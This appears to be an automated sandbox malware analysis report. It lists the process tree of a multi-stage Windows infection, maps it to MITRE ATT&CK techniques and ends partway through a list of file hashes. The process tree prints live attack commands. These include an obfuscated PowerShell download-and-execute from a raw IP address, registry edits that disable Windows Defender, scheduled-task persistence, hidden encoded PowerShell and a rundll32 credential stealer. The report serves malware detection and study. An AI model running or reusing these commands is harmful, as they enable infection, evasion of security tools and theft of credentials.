C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start C:\Users\Admin\AppData\Roaming\soo.exe -p2022
4⤵
PID:4732

C:\Users\Admin\AppData\Roaming\soo.exe
C:\Users\Admin\AppData\Roaming\soo.exe -p2022
5⤵
PID:3160

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\soo.exe
4⤵
PID:6008

C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\Users\Admin\AppData\Roaming\soo.exe
5⤵
- Views/modifies file attributes
PID:6060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{YESS}(N{YESS}{YESS}e{YESS}w-{YESS}Ob{YESS}{YESS}je{YESS}{YESS}c{YESS}t N{YESS}{YESS}e{YESS}t.W{YESS}e';$c4='b{YESS}{YESS}Cli{YESS}{YESS}en{YESS}{YESS}t{YESS}).Do{YESS}{YESS}wn{YESS}{YESS}l{YESS}o';$c3='a{YESS}dS{YESS}{YESS}t{YESS}ri{YESS}{YESS}n{YESS}g{YESS}(''h{YESS}tt{YESS}p:/{YESS}/31.41.244.231/0xMine/go.go''){YESS}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{YESS}',''); IEX $TC |IEX
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start C:\Users\Admin\AppData\Roaming\link.exe -p2022
4⤵
PID:3476

C:\Users\Admin\AppData\Roaming\link.exe
C:\Users\Admin\AppData\Roaming\link.exe -p2022
5⤵
PID:4528

C:\Users\Public\Libraries\Smart.exe
"C:\Users\Public\Libraries\Smart.exe"
6⤵
PID:2792

C:\Users\Admin\AppData\Local\GetProtect.exe
"C:\Users\Admin\AppData\Local\GetProtect.exe"
7⤵
PID:5320

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /RL HIGHEST /TN "GetProtect" /SC ONLOGON /TR "mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\"\"\"C:\Users\Admin\AppData\Local\GetProtect.exe\"\"\")(window.close)"
7⤵
- Creates scheduled task(s)
PID:5392

C:\Users\Public\Libraries\Second.exe
"C:\Users\Public\Libraries\Second.exe"
6⤵
PID:6020

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn OneDrive /rl HIGHEST /tr C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe
7⤵
- Creates scheduled task(s)
PID:5292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe 6020
7⤵
PID:3412

C:\Windows\system32\netstat.exe
netstat.exe -a -n -o
8⤵
- Gathers network information
PID:5452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==
7⤵
PID:4592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\link.exe
4⤵
PID:5796

C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\Users\Admin\AppData\Roaming\link.exe
5⤵
- Views/modifies file attributes
PID:6120

C:\Windows\SysWOW64\cmd.exe
cmd /v/c (set f="C:\Users\Admin\Pictures\Adobe Films\file2.exe.exe"&for /l %l in () do if exist !f! (del /f/a !f!) else (exit))
3⤵
PID:2660

C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Service.bmp.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:1484

C:\Users\Admin\Documents\JOoZKZ_fvtxPLHStfQ0P12at.exe
"C:\Users\Admin\Documents\JOoZKZ_fvtxPLHStfQ0P12at.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4816

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
4⤵
PID:4640

C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup777.exe.exe"
4⤵
PID:2556

C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"
4⤵
PID:4808

C:\Windows\SysWOW64\ftp.exe
ftp -?
5⤵
PID:4312

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Esistenza.wbk
5⤵
PID:5796

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:5908

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
7⤵
- Enumerates processes with tasklist
PID:2152

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
7⤵
PID:4852

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
7⤵
- Enumerates processes with tasklist
PID:4820

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
7⤵
PID:4824

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^VBNKEZcFuClIqCwDfZLYyYSgBIFmwizNsZNbuKFwcrNiUBFraGQiScYWImpWzVEYpvswOEbFzKCelLzZeCux$" Dattero.wbk
7⤵
PID:3428

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Congiunto.exe.pif
Congiunto.exe.pif P
7⤵
PID:4184

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
7⤵
- Runs ping.exe
PID:5244

C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe"
4⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 424
5⤵
- Program crash
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696
5⤵
- Program crash
PID:5980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 716
5⤵
- Program crash
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 732
5⤵
- Program crash
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 732
5⤵
- Program crash
PID:6068

C:\Users\Admin\Pictures\Adobe Films\utube2005.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\utube2005.bmp.exe"
4⤵
PID:3840

C:\Users\Admin\AppData\Local\Temp\7zS3E7B.tmp\Install.exe
.\Install.exe
5⤵
PID:3128

C:\Users\Admin\AppData\Local\Temp\7zS49C6.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
PID:5264

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:5392

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:5860

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:4660

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:4320

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:5864

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:6068

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:6028

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gPxjskAOc" /SC once /ST 07:32:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:3848

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gPxjskAOc"
7⤵
PID:5376

C:\Users\Admin\Pictures\Adobe Films\random.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\random.exe.exe"
4⤵
PID:1932

C:\Users\Admin\Pictures\Adobe Films\random.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\random.exe.exe" -h
5⤵
PID:1492

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4876

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4960

C:\Users\Admin\Pictures\Adobe Films\SetupMEXX.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\SetupMEXX.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 1228
3⤵
- Program crash
PID:5124

C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\FJEfRXZ.exe.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3968

C:\Windows\SysWOW64\ftp.exe
ftp -?
3⤵
PID:3404

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Esistenza.wbk
3⤵
PID:4832

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:5504

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
5⤵
- Enumerates processes with tasklist
PID:5496

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
5⤵
PID:5316

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
5⤵
- Enumerates processes with tasklist
PID:436

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
5⤵
PID:5100

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^VBNKEZcFuClIqCwDfZLYyYSgBIFmwizNsZNbuKFwcrNiUBFraGQiScYWImpWzVEYpvswOEbFzKCelLzZeCux$" Dattero.wbk
5⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Congiunto.exe.pif
Congiunto.exe.pif P
5⤵
PID:5052

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
5⤵
- Runs ping.exe
PID:4988

C:\Users\Admin\Pictures\Adobe Films\camera.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\camera.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 1176
3⤵
- Program crash
PID:5492

C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe"
2⤵
- Executes dropped EXE
PID:2456

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2824

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe"
3⤵
- Executes dropped EXE
PID:4760

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\a319a83a-b617-48c4-861a-2e1be30a33b3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:1656

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:4872

C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\test33.bmp.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:5540

C:\Users\Admin\AppData\Local\22e691f5-8ca0-4fc7-a33d-fa64fd05b4da\build2.exe
"C:\Users\Admin\AppData\Local\22e691f5-8ca0-4fc7-a33d-fa64fd05b4da\build2.exe"
6⤵
PID:4700

C:\Users\Admin\AppData\Local\22e691f5-8ca0-4fc7-a33d-fa64fd05b4da\build2.exe
"C:\Users\Admin\AppData\Local\22e691f5-8ca0-4fc7-a33d-fa64fd05b4da\build2.exe"
7⤵
PID:5368

C:\Users\Admin\Pictures\Adobe Films\rrmix.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\rrmix.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 1240
3⤵
- Program crash
PID:4900

C:\Users\Admin\Pictures\Adobe Films\real2201.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\real2201.bmp.exe"
2⤵
- Executes dropped EXE
PID:3608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im real2201.bmp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\real2201.bmp.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:4936

C:\Windows\SysWOW64\taskkill.exe
taskkill /im real2201.bmp.exe /f
4⤵
- Kills process with taskkill
PID:4608

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 1664
3⤵
- Program crash
PID:5968

C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe"
2⤵
- Executes dropped EXE
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 456
3⤵
- Program crash
PID:4900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 464
3⤵
- Program crash
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 492
3⤵
- Program crash
PID:3988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 492
3⤵
- Program crash
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1040
3⤵
- Program crash
PID:3184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1072
3⤵
- Program crash
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 1376
3⤵
- Program crash
PID:5960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte2205.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte2205.bmp.exe" & exit
3⤵
PID:1356

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte2205.bmp.exe" /f
4⤵
- Kills process with taskkill
PID:5328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 544
3⤵
- Program crash
PID:5724

C:\Users\Admin\Pictures\Adobe Films\rezki1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\rezki1.bmp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:760

C:\Users\Admin\Pictures\Adobe Films\olympteam_build_crypted_3.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\olympteam_build_crypted_3.bmp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3620

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:112

C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:3660

C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
"C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe"
3⤵
- Executes dropped EXE
PID:4844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\
4⤵
PID:5036

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8c7aecc852\
5⤵
PID:5080

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN orxds.exe /TR "C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe" /F
4⤵
- Creates scheduled task(s)
PID:2508

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\b51ecacb95f3fd\cred.dll, Main
4⤵
PID:5400

C:\Users\Admin\Pictures\Adobe Films\Fenix_12.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Fenix_12.bmp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\wam.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
3⤵
PID:5028

C:\Windows\SysWOW64\timeout.exe
timeout 45
4⤵
- Delays execution with timeout.exe
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3036 -ip 3036
1⤵
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3036 -ip 3036
1⤵
PID:3260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3036 -ip 3036
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 3036 -ip 3036
1⤵
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3036 -ip 3036
1⤵
PID:5016

C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
C:\Users\Admin\AppData\Local\Temp\8c7aecc852\orxds.exe
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3036 -ip 3036
1⤵
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 3036 -ip 3036
1⤵
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4912 -ip 4912
1⤵
PID:5256

C:\Users\Admin\AppData\Roaming\soo.exe
C:\Users\Admin\AppData\Roaming\soo.exe start
1⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3036 -ip 3036
1⤵
PID:5848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4912 -ip 4912
1⤵
PID:5864

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:4880

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:3484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 608
3⤵
- Program crash
PID:5536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3484 -ip 3484
1⤵
PID:5400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4912 -ip 4912
1⤵
PID:3648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3036 -ip 3036
1⤵
PID:5244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1724 -ip 1724
1⤵
PID:6128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4912 -ip 4912
1⤵
PID:6016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3608 -ip 3608
1⤵
PID:1760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2160 -ip 2160
1⤵
PID:5388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4912 -ip 4912
1⤵
PID:5516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5428

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3684 -ip 3684
1⤵
PID:6124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2284

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4416

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
727B

MD5
263d12469947e2539c2a2a04bb056345

SHA1
a63fd9efc397db4cc1a82cf89b7fc8e0f6694d39

SHA256
102af65a56e5cea616b871487be0aa8525e3258d514ca80d3a2918c3a4f23315

SHA512
571bd3d3ec72023ea4ec0861baeff535fc3e71716f2c08c3305f25d615448b13a4d4bc0f7d05c500f523ad13e6ba3c2e2549891c63cc170b7f1743bc8a148df1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\572BF21E454637C9F000BE1AF9B1E1A9
Filesize
506B

MD5
66658b656f1930e6f2a5f03dfe38da23

SHA1
b4a6f43bcb6726a2e731579213b0e7fe9e8cc5b4

SHA256
604e63ea3f7b3d33584e49e1e1365cd4ab0b53c8170a7399c197f5ab37b3600f

SHA512
e2452bcbe8180a6b011e617f09c3aaa5d5cafb48a17b30a8eb282daf03bd573133b32d94dcdebe3fc39e24daf4174be7898681dd04ce39fa45cf68a13a2825b4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
d4b6ae0ba9fcf7ed9f0be6fe28e56140

SHA1
9b95fce885254e00976e1a25993d8cf459a71a04

SHA256
812148ef0fe5a5a1871bbd38f4e2edda8e7f279ab8c8c9a3664abf09cccfcf19

SHA512
71bd4a071a6a16dfe0ce0ce587541bd76e972a3e7605c2bddef77231ea61fd8ef04b97f3864dce69adc6d76f557d68e138e24fd43a807de99a29236a629d24d4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
402B

MD5
6223edf37d62258305d046d3efdd90c2

SHA1
6e27ddf852ae977461e403c3c402549d99674edf

SHA256
